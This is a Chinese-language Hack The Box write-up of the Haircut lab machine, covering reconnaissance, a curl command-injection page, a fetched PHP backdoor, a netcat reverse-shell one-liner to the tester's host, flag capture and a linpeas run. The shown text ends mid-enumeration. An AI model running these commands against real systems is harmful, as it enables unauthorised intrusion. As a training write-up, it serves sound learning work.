Haircut-htb-writeup

0x00 靶场技能介绍

章节技能：目录深度遍历扫描、RFL漏洞、curl/7.47.0 文件下载、suid 提权、GNU Screen 4.5.0 - Local Privilege Escalation

参考链接：https://www.jgeek.cn/article/106.html

参考链接：https://0xdf.gitlab.io/2020/09/10/htb-haircut.html

参考链接：https://book.fubared.net/ctf/htb/boxes/10.10.10.24-haircut/haircut.html

0x01 用户权限获取

1、获取下靶机IP地址：10.10.10.24

2、测试下靶机连通率

┌──(kali㉿kali)-[~/桌面]
└─$ ping 10.10.10.24 -c 4
PING 10.10.10.24 (10.10.10.24) 56(84) bytes of data.
64 bytes from 10.10.10.24: icmp_seq=1 ttl=63 time=477 ms
64 bytes from 10.10.10.24: icmp_seq=2 ttl=63 time=310 ms
64 bytes from 10.10.10.24: icmp_seq=3 ttl=63 time=417 ms

--- 10.10.10.24 ping statistics ---
4 packets transmitted, 3 received, 25% packet loss, time 3008ms
rtt min/avg/max/mdev = 310.364/401.398/476.770/68.831 ms

3、开始端口扫描，测试开放端口情况

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -p- -Pn --min-rate=10000 -oG allport 10.10.10.24 
[sudo] kali 的密码：
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-03 16:19 CST
Nmap scan report for 10.10.10.24
Host is up (0.32s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 13.12 seconds

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -sV -sC -p22,80 -Pn --min-rate=10000 10.10.10.24 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-03 16:19 CST
Nmap scan report for 10.10.10.24
Host is up (0.43s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e9:75:c1:e4:b3:63:3c:93:f2:c6:18:08:36:48:ce:36 (RSA)
|   256 87:00:ab:a9:8f:6f:4b:ba:fb:c6:7a:55:a8:60:b2:68 (ECDSA)
|_  256 b6:1b:5c:a9:26:5c:dc:61:b7:75:90:6c:88:51:6e:54 (ED25519)
80/tcp open  http    nginx 1.10.0 (Ubuntu)
|_http-server-header: nginx/1.10.0 (Ubuntu)
|_http-title:  HTB Hairdresser 
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.40 seconds

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -p- -Pn -sU --min-rate=10000 -oG allport 10.10.10.24 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-03 16:20 CST
Warning: 10.10.10.24 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.24
Host is up (0.30s latency).
All 65535 scanned ports on 10.10.10.24 are in ignored states.
Not shown: 65475 open|filtered udp ports (no-response), 60 closed udp ports (port-unreach)

Nmap done: 1 IP address (1 host up) scanned in 74.09 seconds

4、开始目录扫描

┌──(kali㉿kali)-[~/桌面]
└─$ dirsearch -u http://10.10.10.24/                                               
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460

Output File: /home/kali/桌面/reports/http_10.10.10.24/__24-01-03_16-35-22.txt

Target: http://10.10.10.24/

[16:35:22] Starting: 
[16:40:06] 200 -  223B  - /test.html                                        
[16:40:22] 403 -  580B  - /uploads/                                         
[16:40:26] 301 -  194B  - /uploads  ->  http://10.10.10.24/uploads/ 

Task Completed

5、这里简单看下，两个默认页面是什么内容

┌──(kali㉿kali)-[~/桌面]
└─$ curl http://10.10.10.24/
<!DOCTYPE html>

<title> HTB Hairdresser </title>

<center> <br><br><br><br>
<img src="bounce.jpg" height="750" width="1200" alt="" />
<center>

┌──(kali㉿kali)-[~/桌面]
└─$ curl http://10.10.10.24/test.html 
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
  <body>
        <img src='carrie.jpg'></img>
  </body>
</html>

6、其实到这里就已经卡住了，因为这里并没有获取到有效的目录，这里也是看了演示报告才知道的，正确的目录是下面这个路径

http://10.10.10.24/exposed.php

7、查看该页面发现是一个远程页面加载的功能

8、经过各种验证，发现这是一个使用curl功能布设的服务

┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 80
listening on [any] 80 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.24] 37950
GET / HTTP/1.1
Host: 10.10.14.4
User-Agent: curl/7.47.0
Accept: */*

9、由于我们知道这个是一个使用curl的工具的服务，我们可以远程读取我们服务器上的木马文件，然后下载到目标服务器上面

┌──(kali㉿kali)-[~/桌面/htb-tools]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.24 - - [03/Jan/2024 17:16:25] "GET /qsd-php-backdoor.php HTTP/1.1" 200 -

http://10.10.14.4/qsd-php-backdoor.php -o uploads/shell1.php

10、我们成功的把目录上传到服务器上面了

http://10.10.10.24/uploads/shell1.php

11、这里我们直接使用反弹shell功能，获取到初始的权限

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.4 443 >/tmp/f

12、获取到了 www-data 用户的权限

┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.24] 37008
sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ python -c 'import pty;pty.spawn("/bin/bash")'
sh: 2: python: not found
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@haircut:~/html/uploads$ 

13、通过翻找，发现当前用户权限，可以读取到第一个flag文件信息

www-data@haircut:~/html/uploads$ ls -la
ls -la
total 144
drwxr-xr-x 2 www-data www-data   4096 Jan  3 10:16 .
drwxr-xr-x 3 root     root       4096 May 19  2017 ..
-rwxr-xr-x 1 www-data www-data 116637 May 19  2017 bounce.jpg
-rw-r--r-- 1 www-data www-data     32 Jan  3 10:11 shell.php
-rw-r--r-- 1 www-data www-data  13585 Jan  3 10:16 shell1.php
www-data@haircut:~/html/uploads$ cd ../
cd ../
www-data@haircut:~/html$ ls -la
ls -la
total 444
drwxr-xr-x 3 root     root       4096 May 19  2017 .
drwxr-xr-x 3 root     root       4096 May 16  2017 ..
-rwxr-xr-x 1 root     root     116637 May 15  2017 bounce.jpg
-rwxr-xr-x 1 root     root     167677 May 15  2017 carrie.jpg
-rwxr-xr-x 1 root     root        921 May 15  2017 exposed.php
-rwxr-xr-x 1 root     root        141 May 15  2017 hair.html
-rwxr-xr-x 1 root     root        144 May 15  2017 index.html
-rwxr-xr-x 1 root     root     135186 May 15  2017 sea.jpg
-rwxr-xr-x 1 root     root        223 May 15  2017 test.html
drwxr-xr-x 2 www-data www-data   4096 Jan  3 10:16 uploads
www-data@haircut:~/html$ ls -la /home
ls -la /home
total 12
drwxr-xr-x  3 root  root  4096 Jul 13  2021 .
drwxr-xr-x 23 root  root  4096 Jul 13  2021 ..
drwxr-xr-x 15 maria maria 4096 Jul 13  2021 maria
www-data@haircut:~/html$ la -la /home/maria
la -la /home/maria
la: command not found
www-data@haircut:~/html$ ls -la /home/maria
ls -la /home/maria
total 104
drwxr-xr-x 15 maria maria 4096 Jul 13  2021 .
drwxr-xr-x  3 root  root  4096 Jul 13  2021 ..
-rw-------  1 maria maria  322 May 16  2017 .ICEauthority
-rw-------  1 maria maria   52 May 16  2017 .Xauthority
-rw-------  1 maria maria    1 Dec 24  2017 .bash_history
-rw-r--r--  1 maria maria  220 May 15  2017 .bash_logout
-rw-r--r--  1 maria maria 3771 May 15  2017 .bashrc
drwx------  9 maria maria 4096 Jul 13  2021 .cache
drwx------ 12 maria maria 4096 Jul 13  2021 .config
-rw-r--r--  1 maria maria   25 May 16  2017 .dmrc
drwxr-xr-x  3 maria maria 4096 Jul 13  2021 .local
-rw-------  1 maria maria  255 May 16  2017 .mysql_history
drwxrwxr-x  2 maria maria 4096 Jul 13  2021 .nano
-rw-r--r--  1 maria maria  655 May 15  2017 .profile
-rw-r--r--  1 maria maria    0 May 16  2017 .sudo_as_admin_successful
drwxrwxr-x  2 maria maria 4096 Jul 13  2021 .tasks
-rw-rw-r--  1 maria maria  203 May 19  2017 .wget-hsts
-rw-------  1 maria maria  957 May 16  2017 .xsession-errors
drwxr-xr-x  2 maria maria 4096 Jul 13  2021 Desktop
drwxr-xr-x  2 maria maria 4096 Jul 13  2021 Documents
drwxr-xr-x  2 maria maria 4096 Jul 13  2021 Downloads
drwxr-xr-x  2 maria maria 4096 Jul 13  2021 Music
drwxr-xr-x  2 maria maria 4096 Jul 13  2021 Pictures
drwxr-xr-x  2 maria maria 4096 Jul 13  2021 Public
drwxr-xr-x  2 maria maria 4096 Jul 13  2021 Templates
drwxr-xr-x  2 maria maria 4096 Jul 13  2021 Videos
-rw-r--r--  1 root  root    33 Jan  3 09:17 user.txt
www-data@haircut:~/html$ cat /home/maria/user.txt
cat /home/maria/user.txt
ef46f8691299b126fa6581d75ca97b6e
www-data@haircut:~/html$ 

0x02 系统权限获取

14、在系统权限的获取上，我显示翻阅服务目录，又是翻阅目标用户目录，均是无收获

www-data@haircut:~/html$ ls -la
ls -la
total 444
drwxr-xr-x 3 root     root       4096 May 19  2017 .
drwxr-xr-x 3 root     root       4096 May 16  2017 ..
-rwxr-xr-x 1 root     root     116637 May 15  2017 bounce.jpg
-rwxr-xr-x 1 root     root     167677 May 15  2017 carrie.jpg
-rwxr-xr-x 1 root     root        921 May 15  2017 exposed.php
-rwxr-xr-x 1 root     root        141 May 15  2017 hair.html
-rwxr-xr-x 1 root     root        144 May 15  2017 index.html
-rwxr-xr-x 1 root     root     135186 May 15  2017 sea.jpg
-rwxr-xr-x 1 root     root        223 May 15  2017 test.html
drwxr-xr-x 2 www-data www-data   4096 Jan  3 10:16 uploads
www-data@haircut:~/html$ cat exposed.php
cat exposed.php
<html>
        <head>
                <title>Hairdresser checker</title>
        </head>
        <body>
        <form action='exposed.php' method='POST'>
                <span>
                <p>
                Enter the Hairdresser's location you would like to check. Example: http://localhost/test.html
                </p>
                </span>
                <input type='text' name='formurl' id='formurl' width='50' value='http://localhost/test.html'/>
                <input type='submit' name='submit' value='Go' id='submit' />
        </form>
        <span>
                <?php 
                        if(isset($_POST['formurl'])){
                        echo "<p>Requesting Site...</p>"; 
                        $userurl=$_POST['formurl'];
                        $naughtyurl=0;
                        $disallowed=array('%','!','|',';','python','nc','perl','bash','&','#','{','}','[',']');
                        foreach($disallowed as $naughty){
                                if(strpos($userurl,$naughty) !==false){
                                        echo $naughty.' is not a good thing to put in a URL';
                                        $naughtyurl=1;
                                }
                        }
                        if($naughtyurl==0){
                                echo shell_exec("curl ".$userurl." 2>&1"); 
                        }
                        }
                ?>
        </span>
        </body>
</html>

www-data@haircut:~/html$ 


www-data@haircut:~/html$ 

www-data@haircut:~/html$ cd /home/maria/
cd /home/maria/
www-data@haircut:/home/maria$ ls -la
ls -la
total 104
drwxr-xr-x 15 maria maria 4096 Jul 13  2021 .
drwxr-xr-x  3 root  root  4096 Jul 13  2021 ..
-rw-------  1 maria maria  322 May 16  2017 .ICEauthority
-rw-------  1 maria maria   52 May 16  2017 .Xauthority
-rw-------  1 maria maria    1 Dec 24  2017 .bash_history
-rw-r--r--  1 maria maria  220 May 15  2017 .bash_logout
-rw-r--r--  1 maria maria 3771 May 15  2017 .bashrc
drwx------  9 maria maria 4096 Jul 13  2021 .cache
drwx------ 12 maria maria 4096 Jul 13  2021 .config
-rw-r--r--  1 maria maria   25 May 16  2017 .dmrc
drwxr-xr-x  3 maria maria 4096 Jul 13  2021 .local
-rw-------  1 maria maria  255 May 16  2017 .mysql_history
drwxrwxr-x  2 maria maria 4096 Jul 13  2021 .nano
-rw-r--r--  1 maria maria  655 May 15  2017 .profile
-rw-r--r--  1 maria maria    0 May 16  2017 .sudo_as_admin_successful
drwxrwxr-x  2 maria maria 4096 Jul 13  2021 .tasks
-rw-rw-r--  1 maria maria  203 May 19  2017 .wget-hsts
-rw-------  1 maria maria  957 May 16  2017 .xsession-errors
drwxr-xr-x  2 maria maria 4096 Jul 13  2021 Desktop
drwxr-xr-x  2 maria maria 4096 Jul 13  2021 Documents
drwxr-xr-x  2 maria maria 4096 Jul 13  2021 Downloads
drwxr-xr-x  2 maria maria 4096 Jul 13  2021 Music
drwxr-xr-x  2 maria maria 4096 Jul 13  2021 Pictures
drwxr-xr-x  2 maria maria 4096 Jul 13  2021 Public
drwxr-xr-x  2 maria maria 4096 Jul 13  2021 Templates
drwxr-xr-x  2 maria maria 4096 Jul 13  2021 Videos
-rw-r--r--  1 root  root    33 Jan  3 09:17 user.txt
www-data@haircut:/home/maria$ cat .dmrc
cat .dmrc
[Desktop]
Session=ubuntu
www-data@haircut:/home/maria$ cd .config
cd .config
bash: cd: .config: Permission denied
www-data@haircut:/home/maria$ cd .local
cd .local
www-data@haircut:/home/maria/.local$ ls -la
ls -la
total 12
drwxr-xr-x  3 maria maria 4096 Jul 13  2021 .
drwxr-xr-x 15 maria maria 4096 Jul 13  2021 ..
drwxr-xr-x  6 maria maria 4096 Jul 13  2021 share
www-data@haircut:/home/maria/.local$ cd share
cd share
www-data@haircut:/home/maria/.local/share$ ls -la
ls -la
total 28
drwxr-xr-x 6 maria maria 4096 Jul 13  2021 .
drwxr-xr-x 3 maria maria 4096 Jul 13  2021 ..
-rw-rw-r-- 1 maria maria    0 May 16  2017 .converted-launchers
drwx------ 2 maria maria 4096 Jul 13  2021 applications
drwx------ 3 maria maria 4096 Jul 13  2021 nautilus
-rw-rw-r-- 1 maria maria  256 May 16  2017 session_migration-ubuntu
drwx------ 2 maria maria 4096 Jul 13  2021 sounds
drwxr-xr-x 2 maria maria 4096 Jul 13  2021 unity-settings-daemon
www-data@haircut:/home/maria/.local/share$ cat session_migration-ubuntu
cat session_migration-ubuntu
[State]
timestamp=1494926439
migrated=03_unity_first_run_stamp_move;00_remove_obsolete_plugins_in_unity_session_v3.py;04_unity_update_software_center_desktop_file;01_unity_change_dconf_path;02_unity_setup_text_scale_factor;nautilus-unity-launcher-icon.py;
www-data@haircut:/home/maria/.local/share$ cd unity-settings-daemon
cd unity-settings-daemon
www-data@haircut:/home/maria/.local/share/unity-settings-daemon$ ls -la
ls -la
total 8
drwxr-xr-x 2 maria maria 4096 Jul 13  2021 .
drwxr-xr-x 6 maria maria 4096 Jul 13  2021 ..
-rw-rw-r-- 1 maria maria    0 May 16  2017 input-sources-converted
www-data@haircut:/home/maria/.local/share/unity-settings-daemon$ cat input-sources-converted
<a/.local/share/unity-settings-daemon$ cat input-sources-converted           
www-data@haircut:/home/maria/.local/share/unity-settings-daemon$ 

www-data@haircut:/home/maria/.local/share/unity-settings-daemon$ cd ../../
cd ../../
www-data@haircut:/home/maria/.local$ cd ../
cd ../
www-data@haircut:/home/maria$ ls -la
ls -la
total 104
drwxr-xr-x 15 maria maria 4096 Jul 13  2021 .
drwxr-xr-x  3 root  root  4096 Jul 13  2021 ..
-rw-------  1 maria maria  322 May 16  2017 .ICEauthority
-rw-------  1 maria maria   52 May 16  2017 .Xauthority
-rw-------  1 maria maria    1 Dec 24  2017 .bash_history
-rw-r--r--  1 maria maria  220 May 15  2017 .bash_logout
-rw-r--r--  1 maria maria 3771 May 15  2017 .bashrc
drwx------  9 maria maria 4096 Jul 13  2021 .cache
drwx------ 12 maria maria 4096 Jul 13  2021 .config
-rw-r--r--  1 maria maria   25 May 16  2017 .dmrc
drwxr-xr-x  3 maria maria 4096 Jul 13  2021 .local
-rw-------  1 maria maria  255 May 16  2017 .mysql_history
drwxrwxr-x  2 maria maria 4096 Jul 13  2021 .nano
-rw-r--r--  1 maria maria  655 May 15  2017 .profile
-rw-r--r--  1 maria maria    0 May 16  2017 .sudo_as_admin_successful
drwxrwxr-x  2 maria maria 4096 Jul 13  2021 .tasks
-rw-rw-r--  1 maria maria  203 May 19  2017 .wget-hsts
-rw-------  1 maria maria  957 May 16  2017 .xsession-errors
drwxr-xr-x  2 maria maria 4096 Jul 13  2021 Desktop
drwxr-xr-x  2 maria maria 4096 Jul 13  2021 Documents
drwxr-xr-x  2 maria maria 4096 Jul 13  2021 Downloads
drwxr-xr-x  2 maria maria 4096 Jul 13  2021 Music
drwxr-xr-x  2 maria maria 4096 Jul 13  2021 Pictures
drwxr-xr-x  2 maria maria 4096 Jul 13  2021 Public
drwxr-xr-x  2 maria maria 4096 Jul 13  2021 Templates
drwxr-xr-x  2 maria maria 4096 Jul 13  2021 Videos
-rw-r--r--  1 root  root    33 Jan  3 09:17 user.txt
www-data@haircut:/home/maria$ cd .nano    
cd .nano
www-data@haircut:/home/maria/.nano$ ls -la
ls -la
total 8
drwxrwxr-x  2 maria maria 4096 Jul 13  2021 .
drwxr-xr-x 15 maria maria 4096 Jul 13  2021 ..
www-data@haircut:/home/maria/.nano$ cd ../
cd ../
www-data@haircut:/home/maria$ cat .profile
cat .profile
# ~/.profile: executed by the command interpreter for login shells.
# This file is not read by bash(1), if ~/.bash_profile or ~/.bash_login
# exists.
# see /usr/share/doc/bash/examples/startup-files for examples.
# the files are located in the bash-doc package.

# the default umask is set in /etc/profile; for setting the umask
# for ssh logins, install and configure the libpam-umask package.
#umask 022

# if running bash
if [ -n "$BASH_VERSION" ]; then
    # include .bashrc if it exists
    if [ -f "$HOME/.bashrc" ]; then
        . "$HOME/.bashrc"
    fi
fi

# set PATH so it includes user's private bin directories
PATH="$HOME/bin:$HOME/.local/bin:$PATH"
www-data@haircut:/home/maria$ cat .tasks
cat .tasks
cat: .tasks: Is a directory
www-data@haircut:/home/maria$ cat .wget-hsts
cat .wget-hsts
# HSTS 1.0 Known Hosts database for GNU Wget.
# Edit at your own risk.
# <hostname>[:<port>]   <incl. subdomains>      <created>       <max-age>
ftp.gnu.org     0       0       1495170740      63072000
github.com      0       1       1495172243      31536000
www-data@haircut:/home/maria$ cd Desktop
cd Desktop
www-data@haircut:/home/maria/Desktop$ ls -la
ls -la
total 12
drwxr-xr-x  2 maria maria 4096 Jul 13  2021 .
drwxr-xr-x 15 maria maria 4096 Jul 13  2021 ..
-r--r--r--  1 root  root    34 May 16  2017 user.txt
www-data@haircut:/home/maria/Desktop$ cat user.txt
cat user.txt
 0b0da2af50e9ab7c81a6ec2c562afeae
www-data@haircut:/home/maria/Desktop$ cd ../
cd ../
www-data@haircut:/home/maria$ ls -la
ls -la
total 104
drwxr-xr-x 15 maria maria 4096 Jul 13  2021 .
drwxr-xr-x  3 root  root  4096 Jul 13  2021 ..
-rw-------  1 maria maria  322 May 16  2017 .ICEauthority
-rw-------  1 maria maria   52 May 16  2017 .Xauthority
-rw-------  1 maria maria    1 Dec 24  2017 .bash_history
-rw-r--r--  1 maria maria  220 May 15  2017 .bash_logout
-rw-r--r--  1 maria maria 3771 May 15  2017 .bashrc
drwx------  9 maria maria 4096 Jul 13  2021 .cache
drwx------ 12 maria maria 4096 Jul 13  2021 .config
-rw-r--r--  1 maria maria   25 May 16  2017 .dmrc
drwxr-xr-x  3 maria maria 4096 Jul 13  2021 .local
-rw-------  1 maria maria  255 May 16  2017 .mysql_history
drwxrwxr-x  2 maria maria 4096 Jul 13  2021 .nano
-rw-r--r--  1 maria maria  655 May 15  2017 .profile
-rw-r--r--  1 maria maria    0 May 16  2017 .sudo_as_admin_successful
drwxrwxr-x  2 maria maria 4096 Jul 13  2021 .tasks
-rw-rw-r--  1 maria maria  203 May 19  2017 .wget-hsts
-rw-------  1 maria maria  957 May 16  2017 .xsession-errors
drwxr-xr-x  2 maria maria 4096 Jul 13  2021 Desktop
drwxr-xr-x  2 maria maria 4096 Jul 13  2021 Documents
drwxr-xr-x  2 maria maria 4096 Jul 13  2021 Downloads
drwxr-xr-x  2 maria maria 4096 Jul 13  2021 Music
drwxr-xr-x  2 maria maria 4096 Jul 13  2021 Pictures
drwxr-xr-x  2 maria maria 4096 Jul 13  2021 Public
drwxr-xr-x  2 maria maria 4096 Jul 13  2021 Templates
drwxr-xr-x  2 maria maria 4096 Jul 13  2021 Videos
-rw-r--r--  1 root  root    33 Jan  3 09:17 user.txt
www-data@haircut:/home/maria$ cd Documents
cd Documents
www-data@haircut:/home/maria/Documents$ ls -la
ls -la
total 8
drwxr-xr-x  2 maria maria 4096 Jul 13  2021 .
drwxr-xr-x 15 maria maria 4096 Jul 13  2021 ..
www-data@haircut:/home/maria/Documents$ cd ../
cd ../
www-data@haircut:/home/maria$ cd Downloads
cd Downloads
www-data@haircut:/home/maria/Downloads$ ls -la
ls -la
total 8
drwxr-xr-x  2 maria maria 4096 Jul 13  2021 .
drwxr-xr-x 15 maria maria 4096 Jul 13  2021 ..
www-data@haircut:/home/maria/Downloads$ cd ../
cd ../
www-data@haircut:/home/maria$ cd /tmp
cd /tmp
www-data@haircut:/tmp$ ls -la
ls -la
total 36
drwxrwxrwt  9 root     root     4096 Jan  3 10:18 .
drwxr-xr-x 23 root     root     4096 Jul 13  2021 ..
drwxrwxrwt  2 root     root     4096 Jan  3 09:17 .ICE-unix
drwxrwxrwt  2 root     root     4096 Jan  3 09:17 .Test-unix
drwxrwxrwt  2 root     root     4096 Jan  3 09:17 .X11-unix
drwxrwxrwt  2 root     root     4096 Jan  3 09:17 .XIM-unix
drwxrwxrwt  2 root     root     4096 Jan  3 09:17 .font-unix
prw-r--r--  1 www-data www-data    0 Jan  3 10:28 f
drwx------  3 root     root     4096 Jan  3 09:17 systemd-private-4addfdbf36d84214856db3b360e9d715-systemd-timesyncd.service-v98z48
drwx------  2 root     root     4096 Jan  3 09:17 vmware-root
www-data@haircut:/tmp$ 

15、然后开始下载，使用提权神器进行信息检索 linpeas.sh

┌──(kali㉿kali)-[~/桌面/htb-tools]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.24 - - [03/Jan/2024 17:33:18] "GET /linpeas.sh HTTP/1.1" 200 -


www-data@haircut:/tmp$ wget http://10.10.14.4/linpeas.sh
wget http://10.10.14.4/linpeas.sh
--2024-01-03 10:33:16--  http://10.10.14.4/linpeas.sh
Connecting to 10.10.14.4:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 847920 (828K) [text/x-sh]
Saving to: 'linpeas.sh'

linpeas.sh          100%[===================>] 828.05K   225KB/s    in 3.7s    

2024-01-03 10:33:22 (225 KB/s) - 'linpeas.sh' saved [847920/847920]

www-data@haircut:/tmp$ 


www-data@haircut:/tmp$ chmod +x linpeas.sh
chmod +x linpeas.sh
www-data@haircut:/tmp$ ./linpeas.sh
./linpeas.sh


                            ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
                    ▄▄▄▄▄▄▄             ▄▄▄▄▄▄▄▄
             ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄
         ▄▄▄▄     ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄
         ▄    ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄       ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄          ▄▄▄▄▄▄               ▄▄▄▄▄▄ ▄
         ▄▄▄▄▄▄              ▄▄▄▄▄▄▄▄                 ▄▄▄▄ 
         ▄▄                  ▄▄▄ ▄▄▄▄▄                  ▄▄▄
         ▄▄                ▄▄▄▄▄▄▄▄▄▄▄▄                  ▄▄
         ▄            ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄   ▄▄
         ▄      ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄                                ▄▄▄▄
         ▄▄▄▄▄  ▄▄▄▄▄                       ▄▄▄▄▄▄     ▄▄▄▄
         ▄▄▄▄   ▄▄▄▄▄                       ▄▄▄▄▄      ▄ ▄▄
         ▄▄▄▄▄  ▄▄▄▄▄        ▄▄▄▄▄▄▄        ▄▄▄▄▄     ▄▄▄▄▄
         ▄▄▄▄▄▄  ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄   ▄▄▄▄▄ 
          ▄▄▄▄▄▄▄▄▄▄▄▄▄▄        ▄          ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ 
         ▄▄▄▄▄▄▄▄▄▄▄▄▄                       ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄                         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄            ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
          ▀▀▄▄▄   ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▀▀▀▀▀▀
               ▀▀▀▄▄▄▄▄      ▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▀▀
                     ▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀

    /---------------------------------------------------------------------------------\
    |                             Do you like PEASS?                                  |  
    |---------------------------------------------------------------------------------|  
    |         Get the latest version    :     https://github.com/sponsors/carlospolop |  
    |         Follow on Twitter         :     @hacktricks_live                        |  
    |         Respect on HTB            :     SirBroccoli                             |  
    |---------------------------------------------------------------------------------|  
    |                                 Thank you!                                      |  
    \---------------------------------------------------------------------------------/  
          linpeas-ng by carlospolop                                                      
                                                                                         
ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission.                                                                          
                                                                                         
Linux Privesc Checklist: https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist                                                                         
 LEGEND:                                                                                 
  RED/YELLOW: 95% a PE vector
  RED: You should take a look to it
  LightCyan: Users with console
  Blue: Users without console & mounted devs
  Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs) 
  LightMagenta: Your username

 Starting linpeas. Caching Writable Folders...

                               ╔═══════════════════╗
═══════════════════════════════╣ Basic information ╠═══════════════════════════════      
                               ╚═══════════════════╝                                     
OS: Linux version 4.4.0-78-generic (buildd@lgw01-11) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.4) ) #99-Ubuntu SMP Thu Apr 27 15:29:09 UTC 2017
User & Groups: uid=33(www-data) gid=33(www-data) groups=33(www-data)
Hostname: haircut
Writable folder: /dev/shm
[+] /bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h)                                                                                 
[+] /bin/bash is available for network discovery, port scanning and port forwarding (linpeas can discover hosts, scan ports, and forward ports. Learn more with -h)               
[+] /bin/nc is available for network discovery & port scanning (linpeas can discover hosts and scan ports, learn more with -h)                                                    
                                                                                         
                                                                                         

Caching directories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . DONE                                                                    
                                                                                         
                              ╔════════════════════╗
══════════════════════════════╣ System Information ╠══════════════════════════════       
                              ╚════════════════════╝                                     
╔══════════╣ Operative system
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits       
Linux version 4.4.0-78-generic (buildd@lgw01-11) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.4) ) #99-Ubuntu SMP Thu Apr 27 15:29:09 UTC 2017
Distributor ID: Ubuntu
Description:    Ubuntu 16.04.2 LTS
Release:        16.04
Codename:       xenial

╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version          
Sudo version 1.8.16                                                                      


╔══════════╣ PATH
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-path-abuses  
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin                             

╔══════════╣ Date & uptime
Wed Jan  3 10:34:17 CET 2024                                                             
 10:34:17 up  1:17,  0 users,  load average: 0.23, 0.05, 0.02

╔══════════╣ Any sd*/disk* disk in /dev? (limit 20)
disk                                                                                     
sda
sda1
sda2

╔══════════╣ Unmounted file-system?
╚ Check if you can mount umounted devices                                                
/dev/sda1        /               ext4    errors=remount-ro 0       1                     
/dev/sda2        none            swap    sw              0       0

╔══════════╣ Environment
╚ Any private information inside environment variables?                                  
HISTFILESIZE=0                                                                           
USER=www-data
SHLVL=1
HOME=/var/www
OLDPWD=/home/maria
_=./linpeas.sh
HISTSIZE=0
PWD=/tmp
HISTFILE=/dev/null

